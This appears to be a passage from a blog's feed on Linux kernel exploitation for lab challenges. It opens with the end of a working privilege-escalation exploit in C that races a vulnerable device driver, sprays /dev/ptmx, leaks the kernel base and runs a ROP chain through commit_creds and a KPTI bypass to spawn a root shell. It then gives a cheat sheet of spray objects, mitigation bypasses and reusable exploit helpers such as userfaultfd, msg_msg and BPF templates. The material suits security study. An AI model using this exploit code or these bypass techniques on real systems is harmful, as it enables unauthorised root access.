vuln_fd2 = -1; static int race_win = 0; void find_next_fds() { next_fd1 = open(&#34;/tmp&#34;, O_RDONLY); next_fd2 = open(&#34;/tmp&#34;, O_RDONLY); close(next_fd1); close(next_fd2); } void* race_vuln_dev(void* args) { cpu_set_t* cpu_set = (cpu_set_t*)args; if (sched_setaffinity(gettid(), sizeof(cpu_set_t), cpu_set)) { fatal(&#34;sched_setaffinity&#34;); } while (1) { while (!race_win) { int fd = open(&#34;/dev/&#34; VULN_DEVICE_NAME, O_RDWR); if (fd == -1) { continue; } if (fd == next_fd2) { race_win = 1; } if (race_win == 0) { close(fd); } } if (write(next_fd1, &#34;A&#34;, 1) != 1 || write(next_fd2, &#34;a&#34;, 1) != 1) { close(next_fd1); close(next_fd2); race_win = 0; } else { vuln_fd1 = next_fd1; vuln_fd2 = next_fd2; break; } usleep(1000); } return NULL; } void* spray_ptmx(void* args) { cpu_set_t* cpu_set = (cpu_set_t*)args; if (sched_setaffinity(gettid(), sizeof(cpu_set_t), cpu_set)) { fatal(&#34;sched_setaffinity&#34;); } uint64_t val = 0; uint64_t ptmx_spray[800]; for (int i = 0; i &lt; 800; ++i) { usleep(50); ptmx_spray[i] = open(&#34;/dev/ptmx&#34;, O_RDONLY | O_NOCTTY); if (ptmx_spray[i] == -1) { for (int j = 0; j &lt; i; ++j) { close(ptmx_spray[j]); } return (void*)-1; } if (read(vuln_fd2, &amp;val, sizeof(val)) == sizeof(val) &amp;&amp; val == 0x100005401) { for (int j = 0; j &lt; i; ++j) { close(ptmx_spray[j]); } return (void*)ptmx_spray[i]; } } for (int i = 0; i &lt; 800; ++i) { close(ptmx_spray[i]); } return (void*)-1; } int create_overlapped_fd() { pthread_t th[2]; cpu_set_t cpu[2]; char buf[0x10] = { 0, }; CPU_ZERO(&amp;cpu[0]); CPU_ZERO(&amp;cpu[1]); CPU_SET(0, &amp;cpu[0]); CPU_SET(1, &amp;cpu[1]); find_next_fds(); #if PRINT_DEBUG == 1 printf(&#34;[*] next_fd1: %d, next_fd2: %d\n&#34;, next_fd1, next_fd2); #endif pthread_create(&amp;th[0], NULL, race_vuln_dev, (void*)&amp;cpu[0]); pthread_create(&amp;th[1], NULL, race_vuln_dev, (void*)&amp;cpu[1]); pthread_join(th[0], NULL); pthread_join(th[1], NULL); #if PRINT_DEBUG == 1 printf(&#34;[*] vuln_fd1: %d, vuln_fd2: %d\n&#34;, vuln_fd1, vuln_fd2); #endif const char* kTestString = &#34;Hello,Uniguri&#34;; const size_t kTestStringLen = strlen(kTestString); int t = write(next_fd1, kTestString, kTestStringLen); t &amp;= read(next_fd2, buf, kTestStringLen); if (t != kTestStringLen || strcmp(buf, kTestString)) { fatal(&#34;Race fail&#34;); } #if PRINT_DEBUG == 1 puts(&#34;[+] race success&#34;); #endif memset(buf, 0, sizeof(buf)); write(vuln_fd1, buf, sizeof(buf)); close(vuln_fd1); usleep(2000); int loop_cnt = 0; int overlapped_ptmx_fd = (int)(uint64_t)spray_ptmx((void*)&amp;cpu[0]); while (overlapped_ptmx_fd == -1 &amp;&amp; loop_cnt++ &lt; 100) { #if PRINT_DEBUG == 1 puts(&#34;[*] Spraying ptmx on another CPU&#34;); #endif pthread_create(&amp;th[0], NULL, spray_ptmx, (void*)&amp;cpu[1]); pthread_join(th[0], (void*)&amp;overlapped_ptmx_fd); } if (overlapped_ptmx_fd == -1) { fatal(&#34;overlapped_ptmx_fd&#34;); } #if PRINT_DEBUG == 1 printf(&#34;[+] Overlap success: ptmx=%d\n&#34;, overlapped_ptmx_fd); #endif return overlapped_ptmx_fd; } uint64_t kernel_base, g_buf_addr; uint64_t user_cs, user_ss, user_sp, user_rflags; static void save_state() { asm(&#34;mov %[u_cs], cs;\n&#34; &#34;mov %[u_ss], ss;\n&#34; &#34;mov %[u_sp], rsp;\n&#34; &#34;pushf;\n&#34; &#34;pop %[u_rflags];\n&#34; : [u_cs] &#34;=r&#34;(user_cs), [u_ss] &#34;=r&#34;(user_ss), [u_sp] &#34;=r&#34;(user_sp), [u_rflags] &#34;=r&#34;(user_rflags)::&#34;memory&#34;); #if PRINT_DEBUG == 1 printf( &#34;[*] user_cs: 0x%lx, user_ss: 0x%lx, user_sp: 0x%lx, user_rflags: &#34; &#34;0x%lx\n&#34;, user_cs, user_ss, user_sp, user_rflags); #endif } static void get_shell() { char* argv[] = {&#34;/bin/sh&#34;, NULL}; char* envp[] = {NULL}; puts(&#34;[+] Get shell!&#34;); execve(&#34;/bin/sh&#34;, argv, envp); } int main(void) { char buf[VULN_BUFFER_SIZE] = { 0, }; save_state(); create_overlapped_fd(); read(vuln_fd2, buf, sizeof(buf)); kernel_base = *(uint64_t*)(buf + 8 * 3) - 0xc3aec0; g_buf_addr = *(uint64_t*)(buf + 8 * 9) - 0x48; if ((kernel_base &amp; 0xFFF) != 0) { #if PRINT_DEBUG == 1 puts(&#34;[-] Adjust kernel_base&#34;); #endif kernel_base &amp;= (~0xFFF); } if (0xffffffff81000000 &gt; kernel_base || kernel_base &gt; 0xffffffffc0000000) { fatal(&#34;kernel_base&#34;); } #if PRINT_DEBUG == 1 printf(&#34;[+] kernel_base: 0x%lx, g_buf_addr: 0x%lx\n&#34;, kernel_base, g_buf_addr); #endif uint64_t* rop_buf = (uint64_t*)buf; *rop_buf++ = PUSH_RDX_ADD_BYTE_PTR_RBX_POP_RSP_RBP; // overwrite ioctl *rop_buf++ = POP_RDI; *rop_buf++ = 0; *rop_buf++ = PREPARE_KERNEL_CRED; *rop_buf++ = POP_RCX_RBX_RBP; *rop_buf++ = 0; *rop_buf++ = 0; *rop_buf++ = 0; *rop_buf++ = MOV_RDI_RAX_REP; *rop_buf++ = COMMIT_CREDS; *rop_buf++ = BYPASS_KPTI; *rop_buf++ = 0xdeadbeefcafebe00; *rop_buf++ = 0xdeadbeefcafebe01; *rop_buf++ = (uint64_t)(get_shell); *rop_buf++ = (uint64_t)(user_cs); *rop_buf++ = (uint64_t)(user_rflags); *rop_buf++ = (uint64_t)(user_sp); *rop_buf++ = (uint64_t)(user_ss); write(vuln_fd2, buf, sizeof(buf)); int overlapped_ptmx = create_overlapped_fd(); read(vuln_fd2, buf, sizeof(buf)); uint64_t tmp_kernel_base = *(uint64_t*)(buf + 8 * 3) - 0xc3aec0; if ((tmp_kernel_base &amp; 0xFFF) != 0) { tmp_kernel_base &amp;= (~0xFFF); } if (tmp_kernel_base != kernel_base) { fatal(&#34;kernel_base&#34;); } *(uint64_t*)(buf + 8 * 3) = g_buf_addr - 0xC * 8; write(vuln_fd2, buf, sizeof(buf)); ioctl(overlapped_ptmx, 0x00, g_buf_addr); return 0; }</code></pre></div> <h2 id="reference">Reference</h2> <ul> <li><a href="https://pawnyable.cafe/linux-kernel/">https://pawnyable.cafe/linux-kernel/</a></li> </ul> /posts/kernel/basic/ Fri, 20 Dec 2024 07:50:22 +0000 /posts/kernel/basic/ <hr> <h2 id="elastic-oeap-objects">Elastic oeap objects</h2> <table> <thead> <tr> <th>Struct name</th> <th>Generic caches</th> <th>Constraints</th> </tr> </thead> <tbody> <tr> <td><a href="https://elixir.bootlin.com/linux/latest/source/include/keys/user-type.h"><code>struct user_key_payload</code></a></td> <td>kmalloc-[32,32767)</td> <td>only 200 allocation</td> </tr> <tr> <td><a href="https://elixir.bootlin.com/linux/latest/source/include/linux/mm_types.h"><code>struct anon_vma_name</code></a></td> <td>kmalloc-[8,96)</td> <td></td> </tr> <tr> <td><a href="https://elixir.bootlin.com/linux/latest/source/include/linux/msg.h"><code>struct msg_msg</code></a></td> <td>kmalloc-[64,4096)</td> <td>cg cache</td> </tr> <tr> <td><a href="https://elixir.bootlin.com/linux/latest/source/ipc/msgutil.c"><code>struct msg_msgseg</code></a></td> <td>kmalloc-[8,4096)</td> <td>cg cache</td> </tr> <tr> <td><a href="https://elixir.bootlin.com/linux/latest/source/include/drm/drm_property.h"><code>struct drm_property_blob</code></a></td> <td>kmalloc-[96,INT_MAX)</td> <td></td> </tr> <tr> <td><code>char* description</code> in <a href="https://elixir.bootlin.com/linux/latest/source/include/linux/key.h"><code>struct key</code></a></td> <td>kmalloc-[8,4096</td> <td>)</td> </tr> </tbody> </table> <h2 id="mitigations">Mitigations</h2> <ul> <li>SMEP (Supervisor Mode Execution Prevention) <ul> <li>Why? <ul> <li>Prevent RET2USER</li> </ul> </li> <li>Activation: <code>-cpu kvm64,+smep</code> in QEMU runtime argument</li> <li>Check: <code>cat /proc/cpuinfo | grep smep</code></li> <li>Related HW feature: <code>CR4.SMEP</code></li> </ul> </li> <li>SMAP (Supervisor Mode Access Prevention) <ul> <li>Why? <ul> <li>Prevent Stack Pivot</li> </ul> </li> <li>Activation: <code>-cpu kvm64,+smap</code> in QEMU runtime argument</li> <li>Check: <code>cat /proc/cpuinfo | grep smap</code></li> <li>Related HW feature: <code>CR4.SMAP</code>, <code>EFLAGS.AC</code> (<code>STAC</code> and <code>CLAC</code> Assembly)</li> </ul> </li> <li>KASLR (Kernel Address Space Layout Randomization) / FGKASLR (Function Granular KASLR) <ul> <li>Entrophy: <code>0xffffffff81000000</code> ~ <code>0xffffffffc0000000</code></li> <li>Deactivation: <code>-append &quot;...nokaslr...&quot;</code></li> </ul> </li> <li>KPTI (Kernel Page-Table Isolation) <ul> <li>Why? <ul> <li>Prevent Meltdown</li> </ul> </li> <li>Activation: <code>-append &quot;...pti=on...&quot;</code></li> <li>Check: <code>cat /sys/devices/system/cpu/vulnerabilities/meltdown</code></li> <li>Related HW feature: <code>CR3</code></li> <li>Bypass: <ul> <li>If SMAP is disabled, <code>mmap(?, ?, ~ | MAP_POPULATE, ?, ?)</code></li> <li>If ROP is allowed, use <code>ireq</code> in <code>swapgs_restore_regs_and_return_to_usermode</code></li> </ul> </li> </ul> </li> <li>KADR (Kernel Address Display Restriction) <ul> <li>Why? <ul> <li>Hide address in <code>/proc/kallsyms</code></li> </ul> </li> <li>Check: <code>cat /proc/sys/kernel/kptr_restrict</code></li> </ul> </li> </ul> <h2 id="image-related">Image Related</h2> <ul> <li>Unpack CPIO: <code>cpio -idv &lt;../rootfs.cpio</code></li> <li>Pack CPIO: <code>find. -print0 | cpio -o --format=newc --null --owner=root &gt; ../rootfs_updated.cpio</code></li> </ul> <h2 id="debugging">Debugging</h2> <ul> <li>Extract vmlinux from bzImage from <a href="https://github.com/torvalds/linux/blob/master/scripts/extract-vmlinux">https://github.com/torvalds/linux/blob/master/scripts/extract-vmlinux</a>: <ul> <li> <div class="collapsable-code"> <input id="312654897" type="checkbox" checked /> <label for="312654897"> <span class="collapsable-code__language">bash</span> <span class="collapsable-code__title">extract-vmlinux</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-bash" > <code>#!/bin/sh # SPDX-License-Identifier: GPL-2.0-only # ---------------------------------------------------------------------- # extract-vmlinux - Extract uncompressed vmlinux from a kernel image # # Inspired from extract-ikconfig # (c) 2009,2010 Dick Streefland &lt;dick@streefland.net&gt; # # (c) 2011 Corentin Chary &lt;corentin.chary@gmail.com&gt; # # ---------------------------------------------------------------------- check_vmlinux() { # Use readelf to check if it&#39;s a valid ELF # TODO: find a better to way to check that it&#39;s really vmlinux # and not just an elf readelf -h $1 &gt; /dev/null 2&gt;&amp;1 || return 1 cat $1 exit 0 } try_decompress() { # The obscure use of the &#34;tr&#34; filter is to work around older versions of # &#34;grep&#34; that report the byte offset of the line instead of the pattern. # Try to find the header ($1) and decompress from here for pos in `tr &#34;$1\n$2&#34; &#34;\n$2=&#34; &lt; &#34;$img&#34; | grep -abo &#34;^$2&#34;` do pos=${pos%%:*} tail -c+$pos &#34;$img&#34; | $3 &gt; $tmp 2&gt; /dev/null check_vmlinux $tmp done } # Check invocation: me=${0##*/} img=$1 if [ $# -ne 1 -o ! -s &#34;$img&#34; ] then echo &#34;Usage: $me &lt;kernel-image&gt;&#34; &gt;&amp;2 exit 2 fi # Prepare temp files: tmp=$(mktemp /tmp/vmlinux-XXX) trap &#34;rm -f $tmp&#34; 0 # That didn&#39;t work, so retry after decompression. try_decompress &#39;\037\213\010&#39; xy gunzip try_decompress &#39;\3757zXZ\000&#39; abcde unxz try_decompress &#39;BZh&#39; xy bunzip2 try_decompress &#39;\135\0\0\0&#39; xxx unlzma try_decompress &#39;\211\114\132&#39; xy &#39;lzop -d&#39; try_decompress &#39;\002!L\030&#39; xxx &#39;lz4 -d&#39; try_decompress &#39;(\265/\375&#39; xxx unzstd # Finally check for uncompressed images or objects: check_vmlinux $img # Bail out: echo &#34;$me: Cannot find vmlinux.&#34; &gt;&amp;2</code></pre></div> </li> </ul> </li> </ul> <h2 id="build-exploit-code">Build Exploit Code</h2> <ul> <li>Use GLIBC: <code>gcc exploit.c -o exploit -static</code></li> <li>Use MUSL-GCC: <code>/usr/local/musl/bin/musl-gcc exploit.c -o exploit -static</code> <ul> <li>or: <code>gcc -S exploit.c -o exploit.S; musl-gcc exploit.S -o exploit.elf</code></li> </ul> </li> </ul> <h2 id="code-snippet">Code Snippet</h2> <div class="collapsable-code"> <input id="132875469" type="checkbox" checked /> <label for="132875469"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">utils.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #define KERNEL_BASE_START 0xffffffff81000000ull #define KERNEL_BASE_END 0xffffffffc0000000ull #define KERNEL_BASE_MASK (~0x00000000000fffffull) #define IS_IN_KERNEL_RANGE(addr) \ ((addr) &gt;= KERNEL_BASE_START &amp;&amp; (addr) &lt; KERNEL_BASE_END) #define MIN(x, y) (x) &lt; (y) ? (x) : (y) #define MAX(x, y) (x) &gt; (y) ? (x) : (y) static void get_enter_to_continue(const char* msg); static void fatal(const char* msg); static void get_enter_to_continue(const char* msg) { puts(msg); getchar(); } static void fatal(const char* msg) { perror(msg); // get_enter_to_continue(&#34;Press enter to exit...&#34;); exit(-1); }</code></pre></div> <div class="collapsable-code"> <input id="218539746" type="checkbox" checked /> <label for="218539746"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">save_restore_state.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;stdint.h&gt; uint64_t user_cs, user_ss, user_sp, user_rflags; static void save_state() { asm(&#34;mov %[u_cs], cs;\n&#34; &#34;mov %[u_ss], ss;\n&#34; &#34;mov %[u_sp], rsp;\n&#34; &#34;pushf;\n&#34; &#34;pop %[u_rflags];\n&#34; : [u_cs] &#34;=r&#34;(user_cs), [u_ss] &#34;=r&#34;(user_ss), [u_sp] &#34;=r&#34;(user_sp), [u_rflags] &#34;=r&#34;(user_rflags)::&#34;memory&#34;); printf( &#34;[*] user_cs: 0x%lx, user_ss: 0x%lx, user_sp: 0x%lx, user_rflags: &#34; &#34;0x%lx\n&#34;, user_cs, user_ss, user_sp, user_rflags); } static void get_shell() { puts(&#34;[+] Get shell!&#34;); char* argv[] = {&#34;/bin/sh&#34;, NULL}; char* envp[] = {NULL}; execve(&#34;/bin/sh&#34;, argv, envp); } static void restore_state() { asm volatile( &#34;swapgs;\n&#34; &#34;mov qword ptr [rsp+0x20], %[u_ss];\n&#34; &#34;mov qword ptr [rsp+0x18], %[u_sp];\n&#34; &#34;mov qword ptr [rsp+0x10], %[u_rflags];\n&#34; &#34;mov qword ptr [rsp+0x08], %[u_cs];\n&#34; &#34;mov qword ptr [rsp+0x00], %[u_ret];\n&#34; &#34;iretq;\n&#34; ::[u_cs] &#34;r&#34;(user_cs), [u_ss] &#34;r&#34;(user_ss), [u_sp] &#34;r&#34;(user_sp), [u_rflags] &#34;r&#34;(user_rflags), [u_ret] &#34;r&#34;(get_shell)); } // For iretq // *rop_buf++ = (uint64_t)(get_shell); // user_rip // *rop_buf++ = (uint64_t)(user_cs); // *rop_buf++ = (uint64_t)(user_rflags); // *rop_buf++ = (uint64_t)(user_sp); // *rop_buf++ = (uint64_t)(user_ss);</code></pre></div> <div class="collapsable-code"> <input id="493872651" type="checkbox" checked /> <label for="493872651"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">cpu.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#define _GNU_SOURCE #include &lt;sched.h&gt; void pin_to_core(size_t core); void pin_to_core(size_t core) { cpu_set_t target_cpu; CPU_ZERO(&amp;target_cpu); CPU_SET(core, &amp;target_cpu); if (sched_setaffinity(0, sizeof(cpu_set_t), &amp;target_cpu)) { fatal(&#34;sched_setaffinity&#34;); } }</code></pre></div> <div class="collapsable-code"> <input id="162748395" type="checkbox" checked /> <label for="162748395"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">user_key.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;linux/keyctl.h&gt; #include &lt;stdarg.h&gt; #include &lt;stdint.h&gt; #include &lt;sys/syscall.h&gt; #include &lt;syscall.h&gt; #include &lt;unistd.h&gt; /** * type must be &#34;keyring&#34;, &#34;user&#34;, &#34;logon&#34;, or &#34;big_key&#34; */ static int32_t sys_add_key(const char *type, const char *desc, const void *payload, size_t plen, int ringid); static int32_t sys_keyctl(int cmd, ...); static int32_t sys_revoke_key(int32_t key); static int32_t sys_update_key(int32_t key, void *payload, size_t size); static int32_t sys_read_key(int32_t key, char *buf, size_t size); static int32_t sys_add_key(const char *type, const char *desc, const void *payload, size_t plen, int ringid) { return syscall(__NR_add_key, type, desc, payload, plen, ringid); } static int32_t sys_keyctl(int cmd, ...) { va_list ap; long arg2, arg3, arg4, arg5; va_start(ap, cmd); arg2 = va_arg(ap, long); arg3 = va_arg(ap, long); arg4 = va_arg(ap, long); arg5 = va_arg(ap, long); va_end(ap); return syscall(__NR_keyctl, cmd, arg2, arg3, arg4, arg5); } static int32_t sys_revoke_key(int32_t key) { return sys_keyctl(KEYCTL_REVOKE, key); } static int32_t sys_read_key(int32_t key, char *buf, size_t size) { return sys_keyctl(KEYCTL_READ, key, buf, size); } static int32_t sys_update_key(int32_t key, void *payload, size_t size) { return sys_keyctl(KEYCTL_UPDATE, key, payload, size); }</code></pre></div> <div class="collapsable-code"> <input id="561873924" type="checkbox" checked /> <label for="561873924"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">msgmsg.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#define _GNU_SOURCE #include &lt;string.h&gt; #include &lt;sys/ipc.h&gt; #include &lt;sys/msg.h&gt; #include &lt;sys/types.h&gt; int send_msg(int msgqid, char* data, size_t size, long mtype, long mflag); int recv_msg(int msgqid, char* data, size_t size, long mtype, long mflag); int send_msg(int msgqid, char* data, size_t size, long mtype, long mflag) { struct msgbuf* m = malloc(sizeof(long) + size); int ret = -1; memcpy(m-&gt;mtext, data, size); m-&gt;mtype = mtype; ret = msgsnd(msgqid, m, size, mflag); free(m); return ret; } int recv_msg(int msgqid, char* data, size_t size, long mtype, long mflag) { struct msgbuf* m = malloc(sizeof(long) + size); int ret = -1; m-&gt;mtype = mtype; ret = msgrcv(msgqid, m, size, mtype, mflag); memcpy(data, m-&gt;mtext, size); free(m); return ret; } </code></pre></div> <div class="collapsable-code"> <input id="718324965" type="checkbox" checked /> <label for="718324965"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">uffd.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>// Check /proc/sys/vm/unprivileged_userfaultfd #include &lt;fcntl.h&gt; #include &lt;linux/userfaultfd.h&gt; #include &lt;poll.h&gt; #include &lt;pthread.h&gt; #include &lt;stdint.h&gt; #include &lt;sys/ioctl.h&gt; #include &lt;sys/mman.h&gt; #include &lt;sys/syscall.h&gt; #include &lt;unistd.h&gt; int register_uffd(void* addr, size_t len, void* (*handler)(void*)) { struct uffdio_api uffdio_api; struct uffdio_register uffdio_register; pthread_t th; int uffd = syscall(__NR_userfaultfd, __O_CLOEXEC | O_NONBLOCK); if (uffd &lt; 0) { fatal(&#34;syscall(__NR_userfaultfd)&#34;); } uffdio_api.api = UFFD_API; uffdio_api.features = 0; if (ioctl(uffd, UFFDIO_API, &amp;uffdio_api) &lt; 0) { fatal(&#34;ioctl(UFFDIO_API)&#34;); } uffdio_register.range.start = (uint64_t)addr; uffdio_register.range.len = len; uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING; if (ioctl(uffd, UFFDIO_REGISTER, &amp;uffdio_register) &lt; 0) { fatal(&#34;ioctl(UFFDIO_REGISTER)&#34;); } if (pthread_create(&amp;th, NULL, handler, (void*)(uint64_t)uffd) &lt; 0) { fatal(&#34;pthread_create&#34;); } return uffd; } static void* userfault_template_handler(void* args) { if (sched_setaffinity(0, sizeof(cpu_set_t), &amp;target_cpu)) { fatal(&#34;sched_setaffinity&#34;); } int uffd = (int)(long)args; char* page = (char*)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (page == MAP_FAILED) { fatal(&#34;userfault_template_handler: mmap&#34;); } static struct uffd_msg msg; struct uffdio_copy copy; struct pollfd pollfd; puts(&#34;[*] userfault_template_handler: waiting for page fault...&#34;); pollfd.fd = uffd; pollfd.events = POLLIN; while (poll(&amp;pollfd, 1, -1) &gt; 0) { if (pollfd.revents &amp; POLLERR || pollfd.revents &amp; POLLHUP) { fatal(&#34;userfault_template_handler: poll&#34;); } if (read(uffd, &amp;msg, sizeof(msg)) &lt;= 0) { fatal(&#34;userfault_template_handler: read(uffd)&#34;); } if (msg.event != UFFD_EVENT_PAGEFAULT) { fatal(&#34;userfault_template_handler: msg.event != UFFD_EVENT_PAGEFAULT&#34;); } printf(&#34;[*] userfault_template_handler: addr=0x%llx, flag=0x%llx\n&#34;, msg.arg.pagefault.address, msg.arg.pagefault.flags); // Main Routine copy.src = (uint64_t)page; // data of page will be data of faulted page copy.dst = (uint64_t)msg.arg.pagefault.address; copy.len = 0x1000; copy.mode = 0; copy.copy = 0; if (ioctl(uffd, UFFDIO_COPY, &amp;copy) &lt; 0) { fatal(&#34;userfault_template_handler: ioctl(UFFDIO_COPY)&#34;); } } munmap(page, 0x1000); return NULL; }</code></pre></div> <div class="collapsable-code"> <input id="126358749" type="checkbox" checked /> <label for="126358749"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">bpf.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>// Check /proc/sys/kernel/unprivileged_bpf_disabled #include &lt;asm-generic/socket.h&gt; #include &lt;linux/bpf.h&gt; #include &lt;stdint.h&gt; #include &lt;sys/socket.h&gt; #include &lt;sys/syscall.h&gt; #include &lt;unistd.h&gt; #include &#34;bpf_insn.h&#34; int bpf(int cmd, union bpf_attr* attrs) { return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs)); } int bpf_map_create(int val_size, int max_entries) { union bpf_attr attr = { .map_type = BPF_MAP_TYPE_ARRAY, .key_size = sizeof(int), .value_size = val_size, .max_entries = max_entries, }; int map_fd = bpf(BPF_MAP_CREATE, &amp;attr); if (map_fd &lt; 0) { fatal(&#34;bpf(BPF_MAP_CREATE)&#34;); } return map_fd; } int bpf_map_update(int map_fd, int key, void* pval) { union bpf_attr attr = { .map_fd = map_fd, .key = (uint64_t)&amp;key, .value = (uint64_t)pval, .flags = BPF_ANY, }; int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;attr); if (res &lt; 0) { fatal(&#34;bpf(BPF_MAP_UPDATE_ELEM)&#34;); } return res; } int bpf_map_lookup(int map_fd, int key, void* pval) { union bpf_attr attr = { .map_fd = map_fd, .key = (uint64_t)&amp;key, .value = (uint64_t)pval, .flags = BPF_ANY, }; return bpf(BPF_MAP_LOOKUP_ELEM, &amp;attr); } void bpf_template() { char verifier_log[0x10000]; uint64_t val = 0; int mapfd = bpf_map_create(sizeof(uint64_t), 1); bpf_map_update(mapfd, 0, &amp;val); struct bpf_insn insns[] = { // BPF_REG_ARG1 == struct __sk_buff // Instructions BPF_EXIT_INSN(), }; union bpf_attr prog_attr = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insn_cnt = sizeof(insns) / sizeof(insns[0]), .insns = (uint64_t)insns, .license = (uint64_t)&#34;GPL v2&#34;, .log_level = 2, .log_size = sizeof(verifier_log), .log_buf = (uint64_t)verifier_log, }; int progfd = bpf(BPF_PROG_LOAD, &amp;prog_attr); if (progfd &lt; 0) { puts(&#34;============[failed reason]============&#34;); printf(&#34;%s\n&#34;, verifier_log); fatal(&#34;bpf(BPF_PROG_LOAD)&#34;); } int socks[2]; if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) { fatal(&#34;socketpair&#34;); } if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;progfd, sizeof(int))) { fatal(&#34;setsockopt&#34;); } // Trigger the BPF program write(socks[1], &#34;UNIGURI&#34;, 7); bpf_map_lookup(mapfd, 0, &amp;val); close(socks[0]); close(socks[1]); close(progfd); }</code></pre></div> <div class="collapsable-code"> <input id="176932458" type="checkbox" checked /> <label for="176932458"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">bpf_insn.h</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>/* SPDX-License-Identifier: (GPL-2.0-only OR BSD-2-Clause) */ /* eBPF instruction mini library */ #ifndef __BPF_INSN_H #define __BPF_INSN_H struct bpf_insn; /* ArgX, context and stack frame pointer register positions. Note, * Arg1, Arg2, Arg3, etc are used as argument mappings of function * calls in BPF_CALL instruction. */ #define BPF_REG_ARG1 BPF_REG_1 #define BPF_REG_ARG2 BPF_REG_2 #define BPF_REG_ARG3 BPF_REG_3 #define BPF_REG_ARG4 BPF_REG_4 #define BPF_REG_ARG5 BPF_REG_5 #define BPF_REG_CTX BPF_REG_6 #define BPF_REG_FP BPF_REG_10 /* Additional register mappings for converted user programs. */ #define BPF_REG_A BPF_REG_0 #define BPF_REG_X BPF_REG_7 #define BPF_REG_TMP BPF_REG_8 /* BPF program can access up to 512 bytes of stack space. */ #define MAX_BPF_STACK 512 /* ALU ops on registers, bpf_add|sub|...: dst_reg += src_reg */ #define BPF_ALU64_REG(OP, DST, SRC) \ ((struct bpf_insn){.code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = 0}) #define BPF_ALU32_REG(OP, DST, SRC) \ ((struct bpf_insn){.code = BPF_ALU | BPF_OP(OP) | BPF_X, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = 0}) /* ALU ops on immediates, bpf_add|sub|...: dst_reg += imm32 */ #define BPF_ALU64_IMM(OP, DST, IMM) \ ((struct bpf_insn){.code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = 0, \ .imm = IMM}) #define BPF_ALU32_IMM(OP, DST, IMM) \ ((struct bpf_insn){.code = BPF_ALU | BPF_OP(OP) | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = 0, \ .imm = IMM}) /* Endianess conversion, cpu_to_{l,b}e(), {l,b}e_to_cpu() */ #define BPF_ENDIAN(TYPE, DST, LEN) \ ((struct bpf_insn){.code = BPF_ALU | BPF_END | BPF_SRC(TYPE), \ .dst_reg = DST, \ .src_reg = 0, \ .off = 0, \ .imm = LEN}) /* Short form of mov, dst_reg = src_reg */ #define BPF_MOV64_REG(DST, SRC) \ ((struct bpf_insn){.code = BPF_ALU64 | BPF_MOV | BPF_X, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = 0}) #define BPF_MOV32_REG(DST, SRC) \ ((struct bpf_insn){.code = BPF_ALU | BPF_MOV | BPF_X, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = 0}) /* Short form of mov, dst_reg = imm32 */ #define BPF_MOV64_IMM(DST, IMM) \ ((struct bpf_insn){.code = BPF_ALU64 | BPF_MOV | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = 0, \ .imm = IMM}) #define BPF_MOV32_IMM(DST, IMM) \ ((struct bpf_insn){.code = BPF_ALU | BPF_MOV | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = 0, \ .imm = IMM}) /* BPF_LD_IMM64 macro encodes single &#39;load 64-bit immediate&#39; insn */ #define BPF_LD_IMM64(DST, IMM) BPF_LD_IMM64_RAW(DST, 0, IMM) #define BPF_LD_IMM64_RAW(DST, SRC, IMM) \ ((struct bpf_insn){.code = BPF_LD | BPF_DW | BPF_IMM, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = (__u32)(IMM)}), \ ((struct bpf_insn){.code = 0, /* zero is reserved opcode */ \ .dst_reg = 0, \ .src_reg = 0, \ .off = 0, \ .imm = ((__u64)(IMM)) &gt;&gt; 32}) #ifndef BPF_PSEUDO_MAP_FD #define BPF_PSEUDO_MAP_FD 1 #endif /* pseudo BPF_LD_IMM64 insn used to refer to process-local map_fd */ #define BPF_LD_MAP_FD(DST, MAP_FD) \ BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD) /* Direct packet access, R0 = *(uint *) (skb-&gt;data + imm32) */ #define BPF_LD_ABS(SIZE, IMM) \ ((struct bpf_insn){.code = BPF_LD | BPF_SIZE(SIZE) | BPF_ABS, \ .dst_reg = 0, \ .src_reg = 0, \ 